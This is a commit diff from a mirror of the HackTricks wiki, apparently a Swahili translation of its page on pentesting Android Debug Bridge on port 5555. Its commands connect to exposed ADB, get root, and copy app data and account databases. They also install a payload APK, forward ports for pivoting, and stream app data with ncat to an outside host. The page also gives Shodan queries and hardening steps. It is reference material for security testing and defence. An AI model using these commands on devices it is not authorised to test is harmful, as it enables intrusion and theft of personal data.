maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/network-services-pentesting/5555-android-debug-bridge.m

Browse Source
This commit is contained in:
Translator 2025-08-19 00:41:23 +00:00
parent 76633b912a
commit 063a6b4809
1 changed files with 116 additions and 15 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

131
src/network-services-pentesting/5555-android-debug-bridge.md
View File

@ -6,40 +6,141 @@
From [the docs](https://developer.android.com/studio/command-line/adb): From [the docs](https://developer.android.com/studio/command-line/adb):
**Android Debug Bridge** (adb) ni zana ya amri ya mstari inayoweza kutumika kuwasiliana na kifaa. Amri ya adb inarahisisha vitendo mbalimbali vya kifaa, kama vile **kusanidi na kufanyia kazi programu**, na inatoa **ufikiaji wa shell ya Unix** ambayo unaweza kutumia kuendesha amri mbalimbali kwenye kifaa. Android Debug Bridge (adb) ni zana ya amri ya kuwasiliana na vifaa na emulators vinavyotumia Android. Vitendo vya kawaida ni pamoja na kufunga pakiti, kutatua matatizo, na kupata shell ya Unix ya mwingiliano kwenye kifaa.
**Port ya kawaida**: 5555. - Bandari ya TCP ya kihistoria: 5555 (hali ya "adb tcpip" ya jadi).
- Urekebishaji wa kisasa wa Wireless (Android 11+) unatumia TLS pairing na mDNS huduma ya kugundua. Bandari ya kuungana ni ya kubadilika na inagunduliwa kupitia mDNS; inaweza isiwe 5555. Pairing inafanywa kwa adb pair host:port ikifuatiwa na adb connect. Tazama maelezo hapa chini kwa athari za kushambulia.
Example nmap fingerprint:
``` ```
PORT STATE SERVICE VERSION PORT STATE SERVICE VERSION
5555/tcp open adb Android Debug Bridge device (name: msm8909; model: N3; device: msm8909) 5555/tcp open adb Android Debug Bridge device (name: msm8909; model: N3; device: msm8909)
``` ```
## Connect ## Connect
Ikiwa unapata huduma ya ADB ikifanya kazi kwenye bandari ya kifaa na unaweza kuungana nayo, **unaweza kupata shell ndani ya mfumo:** Ikiwa unapata ADB imewekwa wazi na inapatikana, jaribu kuungana na kuhesabu haraka:
```bash ```bash
adb connect 10.10.10.10 adb connect <ip>[:<port>] # Default is 5555 for classic mode
adb root # Try to escalate to root adb devices -l # Confirm it shows as "device" (not unauthorized/offline)
adb shell adb shell # Get an interactive shell (uid usually shell)
whoami; id; getprop ro.debuggable ro.secure service.adb.tcp.port
adb root || true # Works on eng/userdebug/insecure builds, many emulators/IoT
``` ```
Kwa maelezo zaidi ya amri za ADB angalia ukurasa ufuatao: - Ikiwa kifaa kinatekeleza uthibitishaji wa ADB (ro.adb.secure=1), utahitaji kuwa umeidhinishwa mapema (USB RSA auth) au kutumia Android 11+ Wireless debugging pairing (ambayo inahitaji msimbo wa mara moja unaoonyeshwa kwenye kifaa).
- Picha za wauzaji wengine, ujenzi wa uhandisi/userdebug, emulators, TVs, STBs na vifaa vya maendeleo vinatoa adbd bila uthibitisho au na adbd ikikimbia kama root. Katika hali hizo, kwa kawaida utaingia moja kwa moja kwenye shell au root shell.
Kwa rejeleo la jumla la amri za ADB, angalia:
{{#ref}} {{#ref}}
../mobile-pentesting/android-app-pentesting/adb-commands.md ../mobile-pentesting/android-app-pentesting/adb-commands.md
{{#endref}} {{#endref}}
### Punguza data ya programu ## Haraka Baada ya Utekelezaji
Ili kupakua kabisa data ya programu unaweza: Mara tu unapo kuwa na shell, thibitisha haki na muktadha wa SELinux:
```bash ```bash
# From a root console id; getenforce; getprop ro.build.type ro.product.model ro.build.fingerprint
chmod 777 /data/data/com.package
cp -r /data/data/com.package /sdcard Note: Using ADB attacker cannot obtain data directly by using command " adb pull /data/data/com.package". He is compulsorily required to move data to Internal storage and then he can pull that data.
adb pull "/sdcard/com.package"
``` ```
Unaweza kutumia hila hii **kurejesha taarifa nyeti kama nywila za chrome**. Kwa maelezo zaidi kuhusu hii angalia taarifa kwenye viungo vilivyotolewa [**hapa**](https://github.com/carlospolop/hacktricks/issues/274). ### Kuorodhesha na kukamata data
- Orodhesha programu za upande wa tatu na njia:
```bash
pm list packages -3
pm path <pkg>
```
- Ikiwa una root (adb root au su inafanya kazi), unaweza kufikia /data moja kwa moja. Ikiwa la, pendelea run-as kwa programu zinazoweza kudhibitiwa:
```bash
# Bila root, kwa programu inayoweza kudhibitiwa
run-as <pkg> sh -c 'cd /data/data/<pkg> && tar cf - .' | tar xf - -C ./loot/<pkg>
# Kwa root
cp -a /data/data/<pkg> /sdcard/<pkg>
exit
adb pull "/sdcard/<pkg>"
```
- Vitu vya mfumo vinavyofaa (root inahitajika):
- /data/system/users/0/accounts.db na data zinazohusiana na AccountManager
- /data/misc/wifi/ (mipangilio/ufunguo wa mtandao kwenye toleo za zamani)
- DB za SQLite maalum za programu na shared_prefs chini ya /data/data/<pkg>
Unaweza kutumia hii kupata taarifa nyeti (mfano, siri za programu). Kwa maelezo kuhusu kuzingatia data za Chrome, angalia suala lililotajwa [hapa](https://github.com/carlospolop/hacktricks/issues/274).
### Utekelezaji wa msimbo na utoaji wa payload
- Sakinisha na ujipe ruhusa za wakati halisi:
```bash
adb install -r -g payload.apk # -g inatoa ruhusa zote za wakati halisi zilizotangazwa kwenye manifest
adb shell monkey -p <pkg> -c android.intent.category.LAUNCHER 1
```
- Anza shughuli/huduma/matangazo moja kwa moja:
```bash
adb shell am start -n <pkg>/<activity>
adb shell am startservice -n <pkg>/<service>
adb shell am broadcast -a <action>
```
### Kuelekeza bandari na pivoting
Hata bila root, adb inaweza kuelekeza bandari za ndani kwa bandari za kifaa na kinyume chake. Hii ni muhimu kufikia huduma zilizofungwa ndani kwenye kifaa au kufichua huduma za mshambuliaji kwa kifaa.
- Elekeza mwenyeji->kifaa (fikia huduma ya ndani ya kifaa kutoka kwa mwenyeji wako):
```bash
adb forward tcp:2222 tcp:22 # Ikiwa kifaa kinaendesha SSH (mfano, Termux/Dropbear)
adb forward tcp:8081 tcp:8080 # Fichua seva ya ndani ya debug ya programu
```
- Kinyume cha kifaa->mwenyeji (ruhusu kifaa kufikia huduma kwenye mwenyeji wako):
```bash
adb reverse tcp:1080 tcp:1080 # Programu za kifaa sasa zinaweza kufikia mwenyeji:1080 kama 127.0.0.1:1080
```
- Uhamasishaji wa faili kupitia soketi (hakuna maandiko ya sdcard):
```bash
# Kwenye mwenyeji: sikiliza
ncat -lvp 9000 > dump.tar
# Kwenye kifaa: tuma directory kama tar (root au run-as kama inavyofaa)
adb shell "tar cf - /data/data/<pkg>" | ncat <HOST_IP> 9000
```
## Ufuatiliaji wa Wireless (Android 11+)
Android ya kisasa inatekeleza ufuatiliaji wa wireless ulio na ulinzi wa TLS na uunganisho wa upande wa kifaa na ugunduzi wa mDNS:
```bash
# On the device: Developer options -> Wireless debugging -> Pair device with pairing code
# On attacker host (same L2 network, mDNS allowed):
adb pair <device_ip>:<pair_port> # Enter the 6-digit code shown on device
adb mdns services # Discover _adb-tls-connect._tcp / _adb._tcp services
adb connect <device_ip>:<conn_port>
```
Notes
- Ports ni za dinamik; usidhani 5555. Majina ya huduma ya mDNS yanaonekana kama:
- _adb-tls-pairing._tcp (kuunganishwa)
- _adb-tls-connect._tcp (kuunganishwa kwa pamoja)
- _adb._tcp (urithi/plain)
- Ikiwa mDNS imechujwa, kuwezesha USB-assisted kunaweza bado kufanya kazi kwenye baadhi ya toleo: `adb tcpip 5555` kisha `adb connect <ip>:5555` (hadi upya).
Madhara ya kushambulia: ikiwa unaweza kuingiliana na UI ya kifaa (kwa mfano, ufikiaji wa kimwili au makosa ya usanidi wa MDM ya simu) ili kuwezesha Wireless debugging na kuona msimbo wa kuunganishwa, unaweza kuanzisha channel ya ADB iliyounganishwa kwa muda mrefu bila kebo. Baadhi ya OEMs huweka ADB juu ya TCP katika picha za uhandisi/maendeleo bila kuunganishwa—daima angalia.
## Hardening / Detection
Walinda wanapaswa kudhani adbd yoyote inayoweza kufikiwa (TCP) ni hatari muhimu.
- Zima ADB na Wireless debugging wakati hazihitajiki. Futa ruhusa za USB debugging katika chaguzi za Developer.
- Hakikisha sera ya mtandao inazuia TCP/5555 inayokuja na ugunduzi wa ADB wa mDNS kwenye sehemu zisizoaminika.
- Kwenye vifaa chini ya udhibiti wako:
```bash
settings put global adb_enabled 0
setprop service.adb.tcp.port -1 # zima kusikiliza TCP (au tumia: adb usb)
stop adbd; start adbd # anzisha tena daemon
```
- Fuata rekodi za mDNS `_adb._tcp`, `_adb-tls-connect._tcp`, `_adb-tls-pairing._tcp` kwenye mitandao ya kampuni na arifa za wasikilizaji wa 5555 wasiotarajiwa.
- Orodhesha kwa ajili ya toleo zisizo salama: `getprop ro.debuggable`, `ro.build.type`, na `ro.adb.secure`.
## Shodan ## Shodan
- `android debug bridge` - android debug bridge
- port:5555 product:"Android Debug Bridge"
## References
- Android Developers Android Debug Bridge (adb): https://developer.android.com/studio/command-line/adb
- AOSP ADB over WiFi, pairing and mDNS service names: https://android.googlesource.com/platform/packages/modules/adb/+/refs/tags/android-vts-15.0_r2/docs/dev/adb_wifi.md
{{#include ../banners/hacktricks-training.md}} {{#include ../banners/hacktricks-training.md}}